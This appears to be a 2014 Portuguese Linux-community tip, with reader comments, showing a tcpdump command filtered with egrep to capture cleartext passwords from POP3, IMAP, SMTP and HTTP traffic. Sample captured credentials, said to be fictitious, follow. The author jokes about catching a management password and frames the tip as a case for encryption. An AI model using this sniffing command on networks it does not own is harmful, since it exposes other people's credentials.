tcpdump - Capturando senhas de serviços POP3/IMAP/SMTP ou HTTP

Publicado por Charles Josiah Rusch Alandt em 21/02/2014

[ Hits: 13.302 ]

Blog: https://www.linkedin.com/in/charlesjosiah/

 


tcpdump - Capturando senhas de serviços POP3/IMAP/SMTP ou HTTP



Esta é uma dica rápida, utilizando tcpdump para capturar as senhas dos serviços de e-mail (POP3/IMAP/SMTP) e/ou de aplicações em HTTP, e mostrar o usuário e senha em clean-text no shell do seu terminal.

Execute:

# tcpdump -i eth0 port smtp or port imap or port pop3 or port http -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

E deixe rodando...

Para "facilitar", peça para alguém fechar e abrir o cliente de e-mail ou acessar a "Intranet" em o HTTP.

O resultado, será algo assim:
E..?u.@........g.......n....[...P.@.w...USER xxxxx.yyyyy

E..4u.@........g.......n....[...P.@..u..PASS golll123

E..>..@..............M.n...7\2..P...<...USER mazzzzeeee.yyyy

E..5..@..............M.n...M\2..P...!...PASS 14333

Espere até aparecer uma senha da diretoria. :)
E demonstre seu conhecimento. :)

Acredito que conseguirá migrar os seus serviços de e-mail, aplicações HTTP e implementar criptografia.

Observações e considerações:
  • Não é o foco da dica a instalação do tcpdump (apt-get/yum/pkg_add), nem comandos avançados, mas posso escrever um artigo com mais comandos.
  • Nome e senhas fictícios.
  • Para ter o correto funcionamento, executar essa rotina no próprio servidor, Gateway ou por onde passe os pacotes para o servidor a ser "monitorado".

Qualquer dúvida/crítica/sugestão/elogio, fico à disposição.

Abraço a todos.

:wq!

Outras dicas deste autor

Zabbix API com cURL e alguns exemplos de utilização

Fazendo o seu Asterisk contar até 100...

Autenticar usuário e mostrar os membros de um grupo no site PHP via LDAP no AD W2K12

Instalando PortSentry 1.2 no CentOS 7

Leitura recomendada

Zabbix - Configurar senha de interface web

Bloqueando usuários com ARP

Artigo e webinar sobre Nmap - Ferramenta de código aberto com diversas funcionalidades

Proteção Syn Flood de verdade

Como remover a conta "Convidado" do Xubuntu

  

Comentários
[1] Comentário enviado por danniel-lara em 21/02/2014 - 09:19h

Parabéns pela dica
gostei da parte

"" Espere até aparecer uma senha da diretoria. :)
E demonstre seu conhecimento. :)

Acredito que conseguirá migrar os seus serviços de e-mail, aplicações HTTP e implementar criptografia. ""


[2] Comentário enviado por davidossantos em 21/02/2014 - 09:40h

Muito bom. Parabéns!
Um passo a mais a caminho de dominar o mundo MWAHAHhahaha

[3] Comentário enviado por willcamarg em 30/04/2014 - 16:15h

onde vejo o resultado ?

só mostra 1 packets captured
7 '' received

uso centos 6.5

[4] Comentário enviado por JJSantos em 19/06/2014 - 22:49h

Muito bom.



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts